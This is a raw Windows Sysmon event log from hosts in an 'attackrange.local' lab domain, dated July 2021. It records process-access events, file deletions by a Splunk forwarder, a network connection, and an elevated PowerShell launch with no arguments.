08:05:47.261{466BC892-F7DB-60EB-DC7D-00000000CF01}42524212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+44788|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.261{466BC892-F7DB-60EB-DC7D-00000000CF01}4252ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf75ae04.TMPMD5=3B3356EA87C16A41CA99C78E371E6C1E,SHA256=63AD88A80C8FEC2BEECFC6DB2EBD92E331FA5DC4724A25A0B4B943FB61C3261B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:47.245{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.192{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:47.192{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.176{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.176{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F7DB-60EB-DD7D-00000000CF01}6120C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001054028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.176{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F7DB-60EB-DD7D-00000000CF01}6120C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.145{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+105f4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:47.145{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.145{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:47.107{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F7DB-60EB-DD7D-00000000CF01}6120C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.107{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F7DB-60EB-DD7D-00000000CF01}6120C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.107{466BC892-F7DB-60EB-DD7D-00000000CF01}61208124C:\Windows\system32\conhost.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:47.092{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F7DB-60EB-DD7D-00000000CF01}6120C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.092{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.092{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:47.092{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.092{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:47.092{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.092{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:47.092{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\appinfo.dll+2073|c:\windows\system32\appinfo.dll+3c57|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.085{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\system32\ATTACKRANGE\Administrator{466BC892-F7DA-60EB-282E-0C0500000000}0x50c2e283HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-6F0B-00000000CF01}7076C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding 10341000x80000000000000001054012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:47.060{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F7DB-60EB-DB7D-00000000CF01}7900C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.045{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F7DB-60EB-DB7D-00000000CF01}7900C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:47.045{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F7DB-60EB-DB7D-00000000CF01}7900C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.007{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001054008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.007{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810030Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:48.964{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE37301E7EAEBBEAB9782800B6B6BDC6,SHA256=305DA9C8DB453A23661151D5C5B9627885503290F26F7B3A15DF3FFA100B3E5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:48.724{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E745E4EBDB66FD8B08E7932698BC9AEF,SHA256=C8F46E56F7D88C11FDA8853244F930B60BA80CC0B30352370556BE0F0B037F74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:48.325{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E41B54872A63D628198FC56534B8B49C,SHA256=5BAF16538FFB6871477F877220D9E2BF6243E36A32B1A6464D6F0867AE0F58E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:39.689{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61939-false10.0.1.12-8000- 23542300x8000000000000000810031Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:49.964{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E51880139D1440972E7F12F5D5CCA447,SHA256=922E570F4156050682B88C71AA5CE3C20675E8EDEC27A001E711B49EEE55F239,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:49.744{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
